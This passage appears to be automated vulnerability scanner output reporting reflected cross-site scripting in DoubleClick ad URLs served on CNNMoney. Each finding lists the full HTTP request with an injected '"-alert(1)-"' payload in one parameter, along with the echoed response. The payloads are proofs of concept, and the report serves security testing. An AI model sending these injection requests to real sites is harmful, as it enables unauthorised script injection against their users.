User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 23 Mar 2011 19:40:17 GMT
Vary: Accept-Encoding
Expires: Wed, 23 Mar 2011 19:40:17 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7456

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
"http://ad.doubleclick.net/click%3Bh%3Dv8/3ad3/f/1df/%2a/o%3B234200935%3B1-0%3B0%3B58104650%3B4307-300/250%3B38590136/38607893/1%3B%3B%7Esscs%3D%3fhttp://ads.cnn.com/event.ng/Type=click&FlightID=35312197ce9"-alert(1)-"4b1d0a00e01&AdID=485242&TargetID=82896&Segments=1637,2244,2245,2729,2743,3083,3285,7044,8598,12257,13088,13090,13303,17251,18904,18910,18961,22176,23793,25344,25508,25512,25535,25538,25550,30220,31691,33074,33097
...[SNIP]...

1.15. http://ad.doubleclick.net/adi/N6036.CNNMoney.com/B5125476.2 [Redirect parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6036.CNNMoney.com/B5125476.2

Issue detail

The value of the Redirect request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b62df"-alert(1)-"9086fda0f94 was submitted in the Redirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N6036.CNNMoney.com/B5125476.2;sz=300x250;click=http://ads.cnn.com/event.ng/Type=click&FlightID=353121&AdID=485242&TargetID=82896&Segments=1637,2244,2245,2729,2743,3083,3285,7044,8598,12257,13088,13090,13303,17251,18904,18910,18961,22176,23793,25344,25508,25512,25535,25538,25550,30220,31691,33074,33097,33128,33526,33852,34172,38423,38816,40223,40773,42274,42703,43109,45351,45497,45604,45611,45692,46101,46163,46484,46485,46486,46694,46792,46909,47090,47353,47387,47399,47805&Values=1589&Redirect=b62df"-alert(1)-"9086fda0f94 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=336x280_rgt&cnn_money_rollup=homepage&params.styles=fs&bizo_ind=business_services&bizo_func=information_technology&bizo_sen=executive&tile=1300909177541&page.allowcompete=yes&domId=632100
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7415
Cache-Control: no-cache
Pragma: no-cache
Date: Wed, 23 Mar 2011 19:42:53 GMT
Expires: Wed, 23 Mar 2011 19:42:53 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
33097,33128,33526,33852,34172,38423,38816,40223,40773,42274,42703,43109,45351,45497,45604,45611,45692,46101,46163,46484,46485,46486,46694,46792,46909,47090,47353,47387,47399,47805&Values=1589&Redirect=b62df"-alert(1)-"9086fda0f94http%3a%2f%2fwww.schwab.com/public/schwab/investment_products/etfs/schwab_etfs%3Fbmac%3Dpqw%26dsid%3Detfx");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
v
...[SNIP]...

1.16. http://ad.doubleclick.net/adi/N6036.CNNMoney.com/B5125476.2 [Segments parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6036.CNNMoney.com/B5125476.2

Issue detail

The value of the Segments request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5be89"-alert(1)-"f533e927f7a was submitted in the Segments parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N6036.CNNMoney.com/B5125476.2;sz=300x250;click=http://ads.cnn.com/event.ng/Type=click&FlightID=353121&AdID=485242&TargetID=82896&Segments=1637,2244,2245,2729,2743,3083,3285,7044,8598,12257,13088,13090,13303,17251,18904,18910,18961,22176,23793,25344,25508,25512,25535,25538,25550,30220,31691,33074,33097,33128,33526,33852,34172,38423,38816,40223,40773,42274,42703,43109,45351,45497,45604,45611,45692,46101,46163,46484,46485,46486,46694,46792,46909,47090,47353,47387,47399,478055be89"-alert(1)-"f533e927f7a&Values=1589&Redirect=;ord=dhpofrv,bgyutdligxmWA? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=336x280_rgt&cnn_money_rollup=homepage&params.styles=fs&bizo_ind=business_services&bizo_func=information_technology&bizo_sen=executive&tile=1300909177541&page.allowcompete=yes&domId=632100
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 23 Mar 2011 19:42:05 GMT
Vary: Accept-Encoding
Expires: Wed, 23 Mar 2011 19:42:05 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7525

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
550,30220,31691,33074,33097,33128,33526,33852,34172,38423,38816,40223,40773,42274,42703,43109,45351,45497,45604,45611,45692,46101,46163,46484,46485,46486,46694,46792,46909,47090,47353,47387,47399,478055be89"-alert(1)-"f533e927f7a&Values=1589&Redirect=http%3a%2f%2fcontent.schwab.com/m/q410/swtr/swtr_dsgtld.html%3Fbmac%3Dprd%26dsid%3Dmult");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = ""
...[SNIP]...

1.17. http://ad.doubleclick.net/adi/N6036.CNNMoney.com/B5125476.2 [TargetID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6036.CNNMoney.com/B5125476.2

Issue detail

The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e04b9"-alert(1)-"f9561b8c9c2 was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N6036.CNNMoney.com/B5125476.2;sz=300x250;click=http://ads.cnn.com/event.ng/Type=click&FlightID=353121&AdID=485242&TargetID=82896e04b9"-alert(1)-"f9561b8c9c2&Segments=1637,2244,2245,2729,2743,3083,3285,7044,8598,12257,13088,13090,13303,17251,18904,18910,18961,22176,23793,25344,25508,25512,25535,25538,25550,30220,31691,33074,33097,33128,33526,33852,34172,38423,38816,40223,40773,42274,42703,43109,45351,45497,45604,45611,45692,46101,46163,46484,46485,46486,46694,46792,46909,47090,47353,47387,47399,47805&Values=1589&Redirect=;ord=dhpofrv,bgyutdligxmWA? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=336x280_rgt&cnn_money_rollup=homepage&params.styles=fs&bizo_ind=business_services&bizo_func=information_technology&bizo_sen=executive&tile=1300909177541&page.allowcompete=yes&domId=632100
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 23 Mar 2011 19:41:30 GMT
Vary: Accept-Encoding
Expires: Wed, 23 Mar 2011 19:41:30 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7386

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
click%3Bh%3Dv8/3ad3/f/1df/%2a/o%3B234201805%3B0-0%3B0%3B58104650%3B4307-300/250%3B38588595/38606352/1%3B%3B%7Esscs%3D%3fhttp://ads.cnn.com/event.ng/Type=click&FlightID=353121&AdID=485242&TargetID=82896e04b9"-alert(1)-"f9561b8c9c2&Segments=1637,2244,2245,2729,2743,3083,3285,7044,8598,12257,13088,13090,13303,17251,18904,18910,18961,22176,23793,25344,25508,25512,25535,25538,25550,30220,31691,33074,33097,33128,33526,33852,34172,38
...[SNIP]...

1.18. http://ad.doubleclick.net/adi/N6036.CNNMoney.com/B5125476.2 [Values parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6036.CNNMoney.com/B5125476.2

Issue detail

The value of the Values request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 52630"-alert(1)-"90c1f9dbbc4 was submitted in the Values parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N6036.CNNMoney.com/B5125476.2;sz=300x250;click=http://ads.cnn.com/event.ng/Type=click&FlightID=353121&AdID=485242&TargetID=82896&Segments=1637,2244,2245,2729,2743,3083,3285,7044,8598,12257,13088,13090,13303,17251,18904,18910,18961,22176,23793,25344,25508,25512,25535,25538,25550,30220,31691,33074,33097,33128,33526,33852,34172,38423,38816,40223,40773,42274,42703,43109,45351,45497,45604,45611,45692,46101,46163,46484,46485,46486,46694,46792,46909,47090,47353,47387,47399,47805&Values=158952630"-alert(1)-"90c1f9dbbc4&Redirect=;ord=dhpofrv,bgyutdligxmWA? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=336x280_rgt&cnn_money_rollup=homepage&params.styles=fs&bizo_ind=business_services&bizo_func=information_technology&bizo_sen=executive&tile=1300909177541&page.allowcompete=yes&domId=632100
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 23 Mar 2011 19:42:26 GMT
Vary: Accept-Encoding
Expires: Wed, 23 Mar 2011 19:42:26 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7433

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
691,33074,33097,33128,33526,33852,34172,38423,38816,40223,40773,42274,42703,43109,45351,45497,45604,45611,45692,46101,46163,46484,46485,46486,46694,46792,46909,47090,47353,47387,47399,47805&Values=158952630"-alert(1)-"90c1f9dbbc4&Redirect=http%3a%2f%2fwww.schwab.com/public/schwab/investment_products/etfs/etf_learning_center%3Fbmac%3Dpqv%26dsid%3Detfx");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque"
...[SNIP]...

1.19. http://ad.doubleclick.net/adi/N6036.CNNMoney.com/B5125476.2 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6036.CNNMoney.com/B5125476.2

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 29d71"-alert(1)-"9f040ad00c0 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N6036.CNNMoney.com/B5125476.2;sz=300x250;click=http://ads.cnn.com/event.ng/Type=click29d71"-alert(1)-"9f040ad00c0&FlightID=353121&AdID=485242&TargetID=82896&Segments=1637,2244,2245,2729,2743,3083,3285,7044,8598,12257,13088,13090,13303,17251,18904,18910,18961,22176,23793,25344,25508,25512,25535,25538,25550,30220,31691,33074,33097,33128,33526,33852,34172,38423,38816,40223,40773,42274,42703,43109,45351,45497,45604,45611,45692,46101,46163,46484,46485,46486,46694,46792,46909,47090,47353,47387,47399,47805&Values=1589&Redirect=;ord=dhpofrv,bgyutdligxmWA? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=336x280_rgt&cnn_money_rollup=homepage&params.styles=fs&bizo_ind=business_services&bizo_func=information_technology&bizo_sen=executive&tile=1300909177541&page.allowcompete=yes&domId=632100
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 23 Mar 2011 19:39:57 GMT
Vary: Accept-Encoding
Expires: Wed, 23 Mar 2011 19:39:57 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7525

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
ar url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3ad3/f/1df/%2a/k%3B234201955%3B1-0%3B0%3B58104650%3B4307-300/250%3B38756194/38773951/3%3B%3B%7Esscs%3D%3fhttp://ads.cnn.com/event.ng/Type=click29d71"-alert(1)-"9f040ad00c0&FlightID=353121&AdID=485242&TargetID=82896&Segments=1637,2244,2245,2729,2743,3083,3285,7044,8598,12257,13088,13090,13303,17251,18904,18910,18961,22176,23793,25344,25508,25512,25535,25538,25550,30220,3
...[SNIP]...

1.20. http://ad.doubleclick.net/adi/N815.cnnmoney/B5064924.32 [AdID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N815.cnnmoney/B5064924.32

Issue detail

The value of the AdID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c930d"-alert(1)-"c22f0226d15 was submitted in the AdID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N815.cnnmoney/B5064924.32;sz=728x90;click=http://ads.cnn.com/event.ng/Type=click&FlightID=362366&AdID=497675c930d"-alert(1)-"c22f0226d15&TargetID=112211&Segments=1824,2244,2743,3083,3285,6298,6520,6585,7043,8598,12260,17251,18961,19419,22175,25342,25344,25412,30220,33361,33525,33527,33544,33852,33887,34172,34375,35306,38423,38928,40253,40773,41847,42274,42703,43109,45259,45351,45497,45546,45604,45611,45692,46096,46101,46163,46439,46469,46484,46485,46486,46694,46792,46909,47090,47114,47353,47387,47399,47805&Values=1589&Redirect=;ord=cktNqWK,bgyutdWclbasd? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_pagetype=story_sync&cnn_money_position=970x418_top&cnn_money_rollup=business_news&cnn_money_section=the_buzz&params.styles=fs&qcseg=D&qcseg=T&qcseg=291&qcseg=446&qcseg=232&qcseg=239&qcseg=249&qcseg=2900&qcseg=1758&qcseg=756&bizo_ind=business_services&bizo_func=information_technology&bizo_sen=executive&tile=1300909197304&page.allowcompete=yes&domId=236863
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 23 Mar 2011 19:45:19 GMT
Expires: Wed, 23 Mar 2011 19:45:19 GMT
Vary: Accept-Encoding
Cache-Control: private, x-gzip-ok=""
Content-Length: 7619

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Tue Mar 08 11:18:0
...[SNIP]...
doubleclick.net/click%3Bh%3Dv8/3ad3/f/1eb/%2a/i%3B233540379%3B4-0%3B0%3B57088445%3B3454-728/90%3B41064361/41082148/1%3B%3B%7Esscs%3D%3fhttp://ads.cnn.com/event.ng/Type=click&FlightID=362366&AdID=497675c930d"-alert(1)-"c22f0226d15&TargetID=112211&Segments=1824,2244,2743,3083,3285,6298,6520,6585,7043,8598,12260,17251,18961,19419,22175,25342,25344,25412,30220,33361,33525,33527,33544,33852,33887,34172,34375,35306,38423,38928,40253
...[SNIP]...

1.21. http://ad.doubleclick.net/adi/N815.cnnmoney/B5064924.32 [FlightID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N815.cnnmoney/B5064924.32

Issue detail

The value of the FlightID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1ed7e"-alert(1)-"f599974206b was submitted in the FlightID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N815.cnnmoney/B5064924.32;sz=728x90;click=http://ads.cnn.com/event.ng/Type=click&FlightID=3623661ed7e"-alert(1)-"f599974206b&AdID=497675&TargetID=112211&Segments=1824,2244,2743,3083,3285,6298,6520,6585,7043,8598,12260,17251,18961,19419,22175,25342,25344,25412,30220,33361,33525,33527,33544,33852,33887,34172,34375,35306,38423,38928,40253,40773,41847,42274,42703,43109,45259,45351,45497,45546,45604,45611,45692,46096,46101,46163,46439,46469,46484,46485,46486,46694,46792,46909,47090,47114,47353,47387,47399,47805&Values=1589&Redirect=;ord=cktNqWK,bgyutdWclbasd? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_pagetype=story_sync&cnn_money_position=970x418_top&cnn_money_rollup=business_news&cnn_money_section=the_buzz&params.styles=fs&qcseg=D&qcseg=T&qcseg=291&qcseg=446&qcseg=232&qcseg=239&qcseg=249&qcseg=2900&qcseg=1758&qcseg=756&bizo_ind=business_services&bizo_func=information_technology&bizo_sen=executive&tile=1300909197304&page.allowcompete=yes&domId=236863
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 23 Mar 2011 19:44:41 GMT
Expires: Wed, 23 Mar 2011 19:44:41 GMT
Vary: Accept-Encoding
Cache-Control: private, x-gzip-ok=""
Content-Length: 7633

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Tue Nov 30 09:29:38
...[SNIP]...
("http://ad.doubleclick.net/click%3Bh%3Dv8/3ad3/f/1eb/%2a/t%3B233540379%3B0-0%3B0%3B57088445%3B3454-728/90%3B39656681/39674468/1%3B%3B%7Esscs%3D%3fhttp://ads.cnn.com/event.ng/Type=click&FlightID=3623661ed7e"-alert(1)-"f599974206b&AdID=497675&TargetID=112211&Segments=1824,2244,2743,3083,3285,6298,6520,6585,7043,8598,12260,17251,18961,19419,22175,25342,25344,25412,30220,33361,33525,33527,33544,33852,33887,34172,34375,35306,38423
...[SNIP]...

1.22. http://ad.doubleclick.net/adi/N815.cnnmoney/B5064924.32 [Redirect parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N815.cnnmoney/B5064924.32

Issue detail

The value of the Redirect request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2e1db"-alert(1)-"43d125b98c5 was submitted in the Redirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N815.cnnmoney/B5064924.32;sz=728x90;click=http://ads.cnn.com/event.ng/Type=click&FlightID=362366&AdID=497675&TargetID=112211&Segments=1824,2244,2743,3083,3285,6298,6520,6585,7043,8598,12260,17251,18961,19419,22175,25342,25344,25412,30220,33361,33525,33527,33544,33852,33887,34172,34375,35306,38423,38928,40253,40773,41847,42274,42703,43109,45259,45351,45497,45546,45604,45611,45692,46096,46101,46163,46439,46469,46484,46485,46486,46694,46792,46909,47090,47114,47353,47387,47399,47805&Values=1589&Redirect=2e1db"-alert(1)-"43d125b98c5 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_pagetype=story_sync&cnn_money_position=970x418_top&cnn_money_rollup=business_news&cnn_money_section=the_buzz&params.styles=fs&qcseg=D&qcseg=T&qcseg=291&qcseg=446&qcseg=232&qcseg=239&qcseg=249&qcseg=2900&qcseg=1758&qcseg=756&bizo_ind=business_services&bizo_func=information_technology&bizo_sen=executive&tile=1300909197304&page.allowcompete=yes&domId=236863
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7714
Cache-Control: no-cache
Pragma: no-cache
Date: Wed, 23 Mar 2011 19:47:25 GMT
Expires: Wed, 23 Mar 2011 19:52:25 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Tue Mar 08 09:18:11
...[SNIP]...
40253,40773,41847,42274,42703,43109,45259,45351,45497,45546,45604,45611,45692,46096,46101,46163,46439,46469,46484,46485,46486,46694,46792,46909,47090,47114,47353,47387,47399,47805&Values=1589&Redirect=2e1db"-alert(1)-"43d125b98c5http%3a%2f%2fwww.ibm.com/innovation/us/leadership/response/index.html%3Fcmp%3DUSBRB%26cm%3Db%26csr%3Dagus_itlead-20110307%26cr%3Dcnnmoney%26ct%3DUSBRB301%26cn%3Dcapleadmadrid");
var fscUrl = url;
var f
...[SNIP]...

1.23. http://ad.doubleclick.net/adi/N815.cnnmoney/B5064924.32 [Segments parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N815.cnnmoney/B5064924.32

Issue detail

The value of the Segments request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4304a"-alert(1)-"cda7ed7f77b was submitted in the Segments parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N815.cnnmoney/B5064924.32;sz=728x90;click=http://ads.cnn.com/event.ng/Type=click&FlightID=362366&AdID=497675&TargetID=112211&Segments=1824,2244,2743,3083,3285,6298,6520,6585,7043,8598,12260,17251,18961,19419,22175,25342,25344,25412,30220,33361,33525,33527,33544,33852,33887,34172,34375,35306,38423,38928,40253,40773,41847,42274,42703,43109,45259,45351,45497,45546,45604,45611,45692,46096,46101,46163,46439,46469,46484,46485,46486,46694,46792,46909,47090,47114,47353,47387,47399,478054304a"-alert(1)-"cda7ed7f77b&Values=1589&Redirect=;ord=cktNqWK,bgyutdWclbasd? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_pagetype=story_sync&cnn_money_position=970x418_top&cnn_money_rollup=business_news&cnn_money_section=the_buzz&params.styles=fs&qcseg=D&qcseg=T&qcseg=291&qcseg=446&qcseg=232&qcseg=239&qcseg=249&qcseg=2900&qcseg=1758&qcseg=756&bizo_ind=business_services&bizo_func=information_technology&bizo_sen=executive&tile=1300909197304&page.allowcompete=yes&domId=236863
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 23 Mar 2011 19:46:33 GMT
Expires: Wed, 23 Mar 2011 19:46:33 GMT
Vary: Accept-Encoding
Cache-Control: private, x-gzip-ok=""
